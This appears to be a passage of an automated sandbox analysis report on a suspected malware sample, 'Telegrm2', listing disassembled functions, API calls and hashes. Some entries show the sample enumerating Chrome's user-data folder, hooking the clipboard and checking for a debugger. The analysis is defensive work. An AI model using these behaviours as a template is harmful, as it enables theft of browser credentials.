                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$FileFindFirst
                                            • String ID: *.*$\AppData\Local\Google\Chrome\User Data\Default$invalid string position
                                            • API String ID: 3164152327-3505193513
                                            • Opcode ID: 62ba14e457b1494d0ed5e480c7cd2f86e53c75832b4dba8d44577d42997d29df
                                            • Instruction ID: 3d42ef6402929d2d023fa18d560577f42111d7bf0975c4d9b606ad30cf219c22
                                            • Opcode Fuzzy Hash: 62ba14e457b1494d0ed5e480c7cd2f86e53c75832b4dba8d44577d42997d29df
                                            • Instruction Fuzzy Hash: B9519332216F4185EB20DB69F8943DEA3B5F7C57A8F441216DA5D47AB8DF38C649C700
                                            Function 030C2ADC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
                                            • String ID: gfffffff
                                            • API String ID: 1282097019-1523873471
                                            • Opcode ID: 39858543bf15862802d670ce1b8f1131e97f95036861fae457ce87ec13c9d9fc
                                            • Instruction ID: 1af0233ea234bf1d7ef4cf1201a67738f4a0848398f013dd35099bce994e2d2d
                                            • Opcode Fuzzy Hash: 39858543bf15862802d670ce1b8f1131e97f95036861fae457ce87ec13c9d9fc
                                            • Instruction Fuzzy Hash: DEA156637267C88BDF05CB29D59039DBBA9E765B94F08CA69CF590BB95E7388015C300
                                            Function 02DC81C0 Relevance: 12.3, APIs: 8, Instructions: 289COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno_invalid_parameter_noinfowcomexecmd
                                            • String ID:
                                            • API String ID: 1728837525-0
                                            • Opcode ID: 1ecebbeb37ace30139545a725b505b88b7ff7d913080444dcc587744223f7780
                                            • Instruction ID: 60ed8a8a381c1da5d665686d3ad37ea28c0f112c77c21ab48415158efad449b0
                                            • Opcode Fuzzy Hash: 1ecebbeb37ace30139545a725b505b88b7ff7d913080444dcc587744223f7780
                                            • Instruction Fuzzy Hash: 2D61D430718E0E4F9B5AFB399815A7A72C7FBC4304F61862DD89AC3354EF20DC029696
                                            Function 030B2C00 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RtlCaptureContext.KERNEL32(030AAC7C), ref: 030B4567
                                            • RtlLookupFunctionEntry.KERNEL32 ref: 030B4586
                                            • RtlVirtualUnwind.KERNEL32 ref: 030B45D2
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B4644
                                            • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B465C
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B4669
                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B4682
                                            • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B4690
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                            • String ID:
                                            • API String ID: 3778485334-0
                                            • Opcode ID: e3b3019c4e1a7badf9853d60fceb95a9add7947f81aaf153f24320ccf22126c7
                                            • Instruction ID: 79ecb911adbef6852e81dc0648ed77d8a52e3a1dcf7fa435854ad2862ba24598
                                            • Opcode Fuzzy Hash: e3b3019c4e1a7badf9853d60fceb95a9add7947f81aaf153f24320ccf22126c7
                                            • Instruction Fuzzy Hash: 8431477511AF84C5EB61DB56F8A039AB3B8F788794F40512ADA8D47B64DF7CC248CB00
                                            Function 030B4565 Relevance: 12.1, APIs: 8, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlCaptureContext.KERNEL32(030AAC7C), ref: 030B4567
                                            • RtlLookupFunctionEntry.KERNEL32 ref: 030B4586
                                            • RtlVirtualUnwind.KERNEL32 ref: 030B45D2
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B4644
                                            • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B465C
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B4669
                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B4682
                                            • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030B564B), ref: 030B4690
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                            • String ID:
                                            • API String ID: 3778485334-0
                                            • Opcode ID: a3f95b96577147f573111d4e9550727bed5d12e695e8ac549579d4f579014c10
                                            • Instruction ID: 36541e70f4c4edc9ef5bb2ea26f38b0f04c9e491d8426f9eddb5d2bd8b4fca01
                                            • Opcode Fuzzy Hash: a3f95b96577147f573111d4e9550727bed5d12e695e8ac549579d4f579014c10
                                            • Instruction Fuzzy Hash: B821077911AB44CAE711DB96F8A438AB3A8F788794F40121ADA8D47764DF7CC244CB04
                                            Function 02DC6E70 Relevance: 10.9, APIs: 7, Instructions: 423COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _lock.LIBCMT ref: 02DC6E9B
                                            • _get_daylight.LIBCMT ref: 02DC6EB1
                                              • Part of subcall function 02DC7C0C: _errno.LIBCMT ref: 02DC7C15
                                              • Part of subcall function 02DC7C0C: _invalid_parameter_noinfo.LIBCMT ref: 02DC7C20
                                            • _get_daylight.LIBCMT ref: 02DC6EC6
                                              • Part of subcall function 02DC7BAC: _errno.LIBCMT ref: 02DC7BB5
                                              • Part of subcall function 02DC7BAC: _invalid_parameter_noinfo.LIBCMT ref: 02DC7BC0
                                            • _get_daylight.LIBCMT ref: 02DC6EDB
                                              • Part of subcall function 02DC7BDC: _errno.LIBCMT ref: 02DC7BE5
                                              • Part of subcall function 02DC7BDC: _invalid_parameter_noinfo.LIBCMT ref: 02DC7BF0
                                            • ___lc_codepage_func.LIBCMT ref: 02DC6EE8
                                              • Part of subcall function 02DCC3A8: _getptd.LIBCMT ref: 02DCC3AC
                                              • Part of subcall function 02DC84C8: __wtomb_environ.LIBCMT ref: 02DC84F8
                                            • free.LIBCMT ref: 02DC6F59
                                              • Part of subcall function 02DC36E0: _errno.LIBCMT ref: 02DC3700
                                            • free.LIBCMT ref: 02DC6FC2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_get_daylight_invalid_parameter_noinfo$free$___lc_codepage_func__wtomb_environ_getptd_lock
                                            • String ID:
                                            • API String ID: 4268574505-0
                                            • Opcode ID: c1fa7f40eb7c03d34230419b027a93e70f574f0f58e1d6dfd72d0dfeb88afd4a
                                            • Instruction ID: 1a63857ec5f7291e2050318dbed52d1216004da387c053ae052fcd450ea75fd5
                                            • Opcode Fuzzy Hash: c1fa7f40eb7c03d34230419b027a93e70f574f0f58e1d6dfd72d0dfeb88afd4a
                                            • Instruction Fuzzy Hash: B9C190306287468FE729EF28984576AF7DAFB85710F64552E94CAC3355DB309C02CF92
                                            Function 030B9FFC Relevance: 10.6, APIs: 7, Instructions: 143COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32 ref: 030BA060
                                              • Part of subcall function 030B537C: Sleep.KERNEL32(?,?,?,030B4907,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B53C1
                                            • free.LIBCMT ref: 030BA0DE
                                            • free.LIBCMT ref: 030BA125
                                            • GetLocaleInfoW.KERNEL32 ref: 030BA15C
                                            • GetLocaleInfoW.KERNEL32 ref: 030BA186
                                            • free.LIBCMT ref: 030BA193
                                            • GetLocaleInfoW.KERNEL32 ref: 030BA1BE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: InfoLocalefree$ErrorLastSleep
                                            • String ID:
                                            • API String ID: 3746651342-0
                                            • Opcode ID: bbf915b0126b6d411513f53f6a3ce8459f423b85cd882378f28b7d3cfe934764
                                            • Instruction ID: b0c37950410aa046f5d7031818f8c51dcd57ed0380f7bc2731888bbe7df704de
                                            • Opcode Fuzzy Hash: bbf915b0126b6d411513f53f6a3ce8459f423b85cd882378f28b7d3cfe934764
                                            • Instruction Fuzzy Hash: CF410626B2775542E7A1DB26A920BEB76F9BBC9BC4F088525CD094BB44EF7DC401C700
                                            Function 030B5518 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RtlCaptureContext.KERNEL32 ref: 030B5585
                                            • RtlLookupFunctionEntry.KERNEL32 ref: 030B559D
                                            • RtlVirtualUnwind.KERNEL32 ref: 030B55D7
                                            • IsDebuggerPresent.KERNEL32 ref: 030B560D
                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 030B5617
                                            • UnhandledExceptionFilter.KERNEL32 ref: 030B5622
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 66ac2fbe91f68a041350f3fc75b90513e980b9dbad4e79f1f9fa877e40f81b0e
                                            • Instruction ID: 4f3b287ec5009e80981725544a3f50d1fccf2b379696dc02e14c83727ad4334e
                                            • Opcode Fuzzy Hash: 66ac2fbe91f68a041350f3fc75b90513e980b9dbad4e79f1f9fa877e40f81b0e
                                            • Instruction Fuzzy Hash: 38314D36215B8186DB60CF69E8507EE73B4FB89798F541229EB9D47B58DF38C245CB00
                                            Function 030A4380 Relevance: 9.1, APIs: 6, Instructions: 53windowclipboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Message$ClipboardSend$ChainChangeDestroyPostQuitViewerWindow
                                            • String ID:
                                            • API String ID: 267668081-0
                                            • Opcode ID: 082f6aee9610bfdf75166013c68e509d110115bbd60ee7658a241065df36a9e0
                                            • Instruction ID: afa2f75fb96df0775118f844ab2b7f5a83c05a1a9c876197c91cc6c2105352f4
                                            • Opcode Fuzzy Hash: 082f6aee9610bfdf75166013c68e509d110115bbd60ee7658a241065df36a9e0
                                            • Instruction Fuzzy Hash: B001D895763C0183F7664BFABC953AA11D4EB4C752F886520C5058AF60DEACC7D38618
                                            Function 030BCDF8 Relevance: 7.7, APIs: 5, Instructions: 165COMMON
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 030BCE1F
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                            • GetLocaleInfoA.KERNEL32 ref: 030BCE54
                                            • GetLocaleInfoA.KERNEL32 ref: 030BCEAC
                                            • GetLocaleInfoA.KERNEL32 ref: 030BCFA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: InfoLocale$_amsg_exit_getptd
                                            • String ID:
                                            • API String ID: 3133215516-0
                                            • Opcode ID: 097bd1015571da37d6adb283e8fd822c3396d1a0b201fd96983c320ad24f2ba7
                                            • Instruction ID: b3336bff19d9919023fab8f0c621ef1601bea120a316b33d979a481784836240
                                            • Opcode Fuzzy Hash: 097bd1015571da37d6adb283e8fd822c3396d1a0b201fd96983c320ad24f2ba7
                                            • Instruction Fuzzy Hash: 32618932322A86E7DB6DCF75DA543EAB3B8F788745F444129C7298B644DB38E424C700
                                            Function 030BE600 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,030B9D42), ref: 030BE64B
                                            • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,030B9D42), ref: 030BE6DC
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,030B9D42), ref: 030BE717
                                            • free.LIBCMT ref: 030BE72B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: InfoLocale$ByteCharMultiWidefree
                                            • String ID:
                                            • API String ID: 40707599-0
                                            • Opcode ID: 71d8a4af92e69f66e4fa744fc395d1d2ad19f4c66e737d9ebe44dc8d6811dfb8
                                            • Instruction ID: 949b834ae0385fca189e651090ade419dcbaa9b9c9d1a9a3e1bfa33efc548091
                                            • Opcode Fuzzy Hash: 71d8a4af92e69f66e4fa744fc395d1d2ad19f4c66e737d9ebe44dc8d6811dfb8
                                            • Instruction Fuzzy Hash: 92318336312B809AEB51CF25E8506DA77F9F784BE8F584621DF6957B94DB38C501C300
                                            Function 030B6CAC Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 030B6CE5
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                              • Part of subcall function 030B6A70: _getptd.LIBCMT ref: 030B6AAA
                                              • Part of subcall function 030B52FC: malloc.LIBCMT ref: 030B5327
                                              • Part of subcall function 030B52FC: Sleep.KERNEL32(?,?,?,030B9B11,?,?,?,030B9BBB,?,?,0000000D,030B4A1B,?,?,?,030B30B6), ref: 030B533A
                                            • free.LIBCMT ref: 030B6F42
                                            • free.LIBCMT ref: 030B6F79
                                            • free.LIBCMT ref: 030B6F86
                                              • Part of subcall function 030B5664: GetCurrentProcess.KERNEL32(?,?,?,?,030B5706), ref: 030B567C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$_getptd$CurrentProcessSleep_amsg_exitmalloc
                                            • String ID:
                                            • API String ID: 2889500207-0
                                            • Opcode ID: 07cffeec2a758904b2f911cca3e0d62a12451208feaea39215eb330ae1cc0fd6
                                            • Instruction ID: 46e146fa047db031a2604675987c09a142695b8541d96cb2c1c49c45b6880d73
                                            • Opcode Fuzzy Hash: 07cffeec2a758904b2f911cca3e0d62a12451208feaea39215eb330ae1cc0fd6
                                            • Instruction Fuzzy Hash: 3291BA76206B8996CB24DF26E5807DAB7B4F788B88F544126DF8D4BB14EF39D055CB00
                                            Function 02DBFB38 Relevance: 5.9, APIs: 4, Instructions: 892COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: memchrrand
                                            • String ID:
                                            • API String ID: 2128663743-0
                                            • Opcode ID: 85b5146565668c93977723c73af3083d92f2e203ccba0ef059a5ca506d57ecae
                                            • Instruction ID: 2226699ed9f7405de1a76bea4d53be4a7a5396e8e56b63712d85884ad25e2cef
                                            • Opcode Fuzzy Hash: 85b5146565668c93977723c73af3083d92f2e203ccba0ef059a5ca506d57ecae
                                            • Instruction Fuzzy Hash: 82529230124E8D8FDB69EF28C8587E977D2FB58310FA0461EE85AC7291DF709985CB81
                                            Function 030C51A4 Relevance: 5.8, Strings: 4, Instructions: 796COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                            • API String ID: 0-2761157908
                                            • Opcode ID: e6c8a2d0b6664a405eed0e845c007c9e4a2cf3feeada1d9e8a63721b355b0128
                                            • Instruction ID: 0d8e97e812b46f0b80e34d635de284a3d9c4986d69e8d71213888a7386ebc377
                                            • Opcode Fuzzy Hash: e6c8a2d0b6664a405eed0e845c007c9e4a2cf3feeada1d9e8a63721b355b0128
                                            • Instruction Fuzzy Hash: 3352027BF362908BE724CFB6C810BAE3BB6F74634CB448519DE0667E48E634A515C744
                                            Function 030B24A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 229memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AllocLocal
                                            • String ID: base
                                            • API String ID: 3494564517-3233087073
                                            • Opcode ID: 9235514ca399fc7d59608a9ac5b11c447fa18c603c731a8af5bfdfc07723d57b
                                            • Instruction ID: b4b0b60b34e45751026c08de87ab974ba0160789b318381730b4cedd4ad14e35
                                            • Opcode Fuzzy Hash: 9235514ca399fc7d59608a9ac5b11c447fa18c603c731a8af5bfdfc07723d57b
                                            • Instruction Fuzzy Hash: ED8143A6702B8486DB68CF26E0502AEB7B5F788F94F18C615DF590BB94DF39C492C740
                                            Function 030A2380 Relevance: 5.2, APIs: 4, Instructions: 244memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,00000000,00000000,?,030A22C7), ref: 030A24B6
                                            • VirtualFree.KERNEL32(?,?,00000000,00000000,?,030A22C7), ref: 030A24F0
                                            • VirtualAlloc.KERNEL32(?,?,00000000,00000000,?,030A22C7), ref: 030A2643
                                            • VirtualFree.KERNEL32(?,?,00000000,00000000,?,030A22C7), ref: 030A2678
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 667e7e1166942ad4a01b563a56df34aace26f67ad1df216b49367f5cf7a47c00
                                            • Instruction ID: 6ea276cef3edff5ba9a6a365a2cd53487bce2e1a4ec903887e72100e0b28445c
                                            • Opcode Fuzzy Hash: 667e7e1166942ad4a01b563a56df34aace26f67ad1df216b49367f5cf7a47c00
                                            • Instruction Fuzzy Hash: 0691EE32312A8087CB5DDF7DE29066D77AAF788B84F048929DE1A57B14DF34D4A1C740
                                            Function 030B2020 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • free.LIBCMT ref: 030B209A
                                            • VirtualFree.KERNEL32(?,?,00000000,030B1EDE,?,?,?,030AE182), ref: 030B20B5
                                            • GetProcessHeap.KERNEL32(?,?,00000000,030B1EDE,?,?,?,030AE182), ref: 030B20BB
                                            • HeapFree.KERNEL32(?,?,00000000,030B1EDE,?,?,?,030AE182), ref: 030B20C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: FreeHeap$ProcessVirtualfree
                                            • String ID:
                                            • API String ID: 4282497734-0
                                            • Opcode ID: f26f74e579be28588a13ed5e4f7d6e2746d7d4c2692a86a97de5c24af044b0c8
                                            • Instruction ID: 008ed56a1c454b297ad1e597eb4da9fd2a35793d2839fa38b915c62e94c24ca9
                                            • Opcode Fuzzy Hash: f26f74e579be28588a13ed5e4f7d6e2746d7d4c2692a86a97de5c24af044b0c8
                                            • Instruction Fuzzy Hash: 6E119132622A6083DB59CF66E55035DB3B9FB88F84F089521DE4A17B19CF38C492CB80
                                            Function 02DC78DC Relevance: 4.8, APIs: 3, Instructions: 302COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2819658684-0
                                            • Opcode ID: 12095cc6e6c6656046d0964d28f1b6b7969298eb9375bab5b3475d2de16608da
                                            • Instruction ID: 5e3d4e4bbc9983476c3cb3a65aa83bfbeabfebf9cd427dee3aba2f7e7f3056bf
                                            • Opcode Fuzzy Hash: 12095cc6e6c6656046d0964d28f1b6b7969298eb9375bab5b3475d2de16608da
                                            • Instruction Fuzzy Hash: 68812A3172490B0FD70C9E2C8C6A3B476CAE7D8315728D27EE54BCB7A6E934D9428640
                                            Function 030B7F24 Relevance: 4.7, APIs: 3, Instructions: 207COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2819658684-0
                                            • Opcode ID: 267ce151b7aae3d397a4abc3d8bf1fd347020b6d90943b305ec03c618ac3d07d
                                            • Instruction ID: f368e2b22a8e4f6ef78b5b7daa0bebb72434826d9b990a9b992e88b392a8ba6a
                                            • Opcode Fuzzy Hash: 267ce151b7aae3d397a4abc3d8bf1fd347020b6d90943b305ec03c618ac3d07d
                                            • Instruction Fuzzy Hash: B7612EB2B126454BCB5CCF28DC117A866AAA7D8784F48C536EA198F7E8F63CE6014740
                                            Function 030BD0C8 Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 030BD0EA
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                            • GetLocaleInfoA.KERNEL32 ref: 030BD11F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: InfoLocale_amsg_exit_getptd
                                            • String ID:
                                            • API String ID: 488165793-0
                                            • Opcode ID: 992bc5c9bc5eb987d38e4db25a0c305ca6316f32eed5d8e20ae4e22c9568cc7a
                                            • Instruction ID: c88090ada62f762b4dd76827759d0b58614744055c5e12237579b0028f99ce7d
                                            • Opcode Fuzzy Hash: 992bc5c9bc5eb987d38e4db25a0c305ca6316f32eed5d8e20ae4e22c9568cc7a
                                            • Instruction Fuzzy Hash: 8521B632312BC1A7EB69CF2AE9547EAB3B4F788749F084526C7198B204DF38D068C700
                                            Function 02DC72F0 Relevance: 3.3, APIs: 2, Instructions: 311COMMON
                                            Download Yara Rule
